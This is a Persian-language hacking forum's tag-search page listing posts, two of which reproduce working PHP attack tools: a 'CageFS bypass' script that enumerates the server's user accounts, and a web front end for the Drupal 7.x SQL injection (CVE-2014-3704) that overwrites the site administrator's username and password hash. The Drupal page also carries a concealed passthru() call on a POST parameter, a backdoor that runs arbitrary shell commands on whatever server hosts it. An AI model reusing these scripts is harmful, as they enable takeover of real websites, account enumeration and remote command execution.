رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'hack site'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. MR.MSA

    دانلود cms اختصاصی

    با سلام خدمت دوستان عزیز انجمن . در این تاپیک براتون cms های اختصاصی وب سایت ها رو قرار میدم . تاپیک ها رو لایک کنید تا cms ها زودتر قرار بگیرند . روش کار : شما ابتدا فایل zip رو دانلود میکنید که برای هر cms هست و در کنارش یک فایل db.sql هم قرار میدم که دیتابیس اون سایت هست و کافیه فایل ها رو توی هاست یا لوکال هاست قرار بدید و کوئری ها sql رو توی phpmyadmin اجرا کنید و در نهایت اتصال به دیتابیس و کار تمومه . قوانین تاپیک :‌ سوالاتتون رو در بخش سوال و جواب بپرسید . تاپیک اسپم ارسال نکنید و برای تشکر از دکمه کنار تاپیک استفاده کنید . قبل از ارسال تاپیک در اینجا بنده رو در جریان بزارید . موفق و پیروز باشید .
  2. DeMoN

    CageFS Bypass

    <?php #Priv8 CageFS BYPASS #By Br0keN #/etc/passwd <center> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Priv8 CageFS Bypass</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #ffffff; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#D50428" bgcolor="#ffffff" link="#00c000" text="#D50428" vlink="#000000"> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=5><b>Priv8 CageFS Bypass<br></font> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2> EHC TeaM By Br0keN <br><br> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2>Web:vb.ehcommunity.com<br><br><br> etc/passwd/</b></font><br> <?php error_reporting(E_ALL ^ E_NOTICE); if (function_exists('posix_getpwuid')) { if (isset($_POST['Br']) && isset($_POST['x0'])) { $Br = intval($_POST['Br']); $x0 = intval($_POST['x0']); while ($Br < $x0) { $uid = posix_getpwuid($Br); if ($uid) { $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $Br++; } } else { echo ' <form method="POST" action="?br0=x0">Uid FROM : <input type="text" name="Br" value="1" size="4"> TO : <input type="text" name="x0" value="1000" size="4"> <input type="submit" name="Show" value="Show">'; } } else die("Error..! Posix Functions are disabled..!!!"); die(); ?>
  3. DeMoN

    Drupal core 7.x - SQL Injection

    <!Doctype HTML> <html> <head> <script src='[Hidden Content]; <link rel="shortcut icon" href="[Hidden Content]; <title>Drupal Exploit</title> <style type="text/css"> .mymargin{ margin-top:30px; color:white; font-family: monospace; } body{ background-color:#999; } a { color: red; text-decoration: none; } h1 { color: #40E1C9 } h2 { color : #008000; } </style> </head> <body> <center> <img src="[Hidden Content]" width="150" height="160"> <div class="mymargin"> <center> <h1>Drupal Exploit</h1> <h2>Version 7.x</h2> <form method="GET" action=""> Site : <input type="text" name="url" placeholder="Example: www.site.com"> <input size="50" type="submit" name="submit" value="Attack"> </form> <br> <?php #-----------------------------------------------------------------------------# # Exploit Title: Drupal core 7.x - SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: [Hidden Content] # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #-----------------------------------------------------------------------------# error_reporting(0); if ($_POST['alleailss']){ $alleailss = $_POST['alleailss']; passthru($alleailss); } if(isset($_GET['submit'])){ $log = "/user/login"; $url = "[Hidden Content]']; $holako = "/?q=user"; $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; $params = array( 'http' => array( 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $post_data ) ); $ctx = stream_context_create($params); $data = file_get_contents($url . '/user/login/', null, $ctx); echo "<h3>Testing user/login </h3>"; if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) { echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>"; } else { echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; } } if(isset($_GET['submit'])){ $url = "[Hidden Content]']."/"; $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; $params = array( 'http' => array( 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $post_data ) ); $ctx = stream_context_create($params); $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); echo '<h3>Testing at Index</h3>'; if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>"; } else { echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; } } ?> <h3>Developed By <a href="[Hidden Content]; </div> </body> </html>
×
×
  • ایجاد مورد جدید...